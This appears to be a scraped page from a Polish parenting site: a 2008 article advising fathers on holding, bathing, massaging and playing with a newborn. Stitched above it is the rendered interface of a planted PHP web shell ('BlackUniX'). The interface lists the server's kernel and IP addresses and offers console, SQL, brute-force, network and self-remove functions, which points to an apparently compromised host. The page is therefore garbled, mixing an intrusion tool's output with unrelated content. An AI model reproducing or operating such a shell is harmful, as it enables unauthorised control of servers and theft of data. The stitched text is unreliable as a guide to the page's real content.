W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-07-17 09:32:18
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.17.157
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

zajmowanie się małym dzieckiem nie jest niemęskie
13.08.2008.

Dzisiaj ojcostwo rodzi się wcześnie - podczas pierwszego badania USG lub w czasie zajęć w szkole rodzenia. Tatusiowie chcą mieć swój udział w pielęgnacji maleństwa - i bardzo im się to chwali! Rola ojca bardzo się zmieniła. Stereotypy, że zajmowanie się małym dzieckiem jest niemęskie, odeszły do lamusa.

 

Dzisiejszy tata chętnie uczestniczy w pielęgnacji niemowlęcia, z zaangażowaniem szuka informacji na temat jego wychowania. Otwarcie też okazuje dziecku uczucia. Tata ma pomysły na wspaniałe zabawy, pozwala na więcej niż mama i nie jest przewrażliwiony. Miłość ojcowska jest inna,i właśnie w tym tkwi jej wartość.


Najważniejszą rolę pełni kontakt z ciałem bliskiej osoby. Noworodek doskonale zna zapach i ciepło ciała matki. Bliskości z tatą musi się nauczyć. Noś więc maleństwo w pozycji "brzuch w brzuch". Dziecko szybko nauczy się rozpoznawać siłę i ciepło twoich rąk. Nie obawiaj się, że będziesz za mało delikatny. Noworodek nie jest z porcelany - lubi, gdy bierzesz go pewnie w ramiona.

Dotyk jest formą komunikacji. Noworodek czując, że zajmują się nim troskliwe i pewne ręce rodziców, czuje się bezpieczny i kochany. Codzienne zabiegi takie jak przewijanie i kąpiel, to wspaniała okazja do okazania swojemu dziecku zainteresowania i miłości. Nawet jeśli praca zabiera ci większą część dnia, liczą się chwile spędzone razem - gdy całkowicie poświęcasz uwagę maluszkowi. Nie bój się zmiany pieluszki, wychodź z dzieckiem na spacer.

Wodne igraszki

Spraw, by jeden z codziennych rytuałów był twoją domeną. Idealna jest kąpiel, którą zamienisz we wspaniałą zabawę. Zachęć maluszka, by chlapał rączką w wodzie, pokaż, że można brać pianę do ręki, itp. Wspólne chwile zbliżą cię do maleństwa jeszcze bardziej i... dadzą odpocząć jego mamie.

Masaż doskonały

Kiedy nabierzesz wprawy w pielęgnacji maleństwa, możesz nauczyć się delikatnego masażu. To nie jest trudna sztuka: powolnym ruchem, bardzo leciutko uciskając skórę dziecka, przesuwaj dłońmi z góry na dół (od główki ku nóżkom).
W ten sposób możesz masować brzuszek, plecy, również ręce i nóżki swojego dziecka. Możesz również podczas masażu wykonywać okrężne ruchy

pełną dłonią (zwłaszcza gdy niemowlę w pierwszych tygodniach życia cierpi z powodu kolki jelitowej). Taki masaż powinien trwać 1-2 minuty. Ręka powinna poruszać się zgodnie z ruchem wskazówek zegara. Brzuszek możesz masować przez ubranko. Ważne! Przed masażem gołego ciała rozetrzyj wcześniej na dłoniach oliwkę dla niemowląt.
czytaj dalej
 

Czy pielęgnacja małego dziecka wymaga wprawy?

    * Będziemy ustalać macierzyństwo

      Jak donosi "Polska", rząd chce dać więcej praw dzieciom i ich ojcom. więcej »

Tak, ale nie obawiaj się, bo matki też muszą się wszystkiego nauczyć. Zmiana pieluszki, kąpiel czy ubieranie to czynności, które wymagają tylko odrobiny wprawy - po kilku próbach będziesz już mistrzem. Pielęgnacja daje możliwość wspólnego spędzenia czasu i to jest najważniejsze.

Jak okazywać miłość malutkiemu dziecku?

Każdym kontaktem, czułym słowem - tak, jak mówi ci serce. Choć maluszek nie będzie rozumiał sensu słów, wyczuje twoje emocje. Radość, spokój i miłość natychmiast mu się udzielą. Jeżeli nie wiesz, co mówić, po prostu przytul maleństwo do siebie, ponoś je na rękach. Kiedy maluszek usłyszy bicie twojego serca, od razu wyciszy się, uspokoi, może nawet zaśnie.

Kiedy przychodzi czas na zabawę?

Gdy maluszek skończy 4-6 tygodni, zaczyna reagować na otoczenie. Będzie się już uśmiechał. Wykorzystaj okazję i mów do niego jak najwięcej. Baw się z nim, nachylając się nad nim, przechylając głowę na boki, by podążał za nią wzrokiem. Kiedy córka lub synek skończy 4 miesiące, frajdę sprawi mu zabawa w "A-kuku" i "Idzie raczek nieboraczek".

Źródło: Mam Dziecko Aleksandra Godlewska, psycholog dziecięcy
 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


17.07.2018.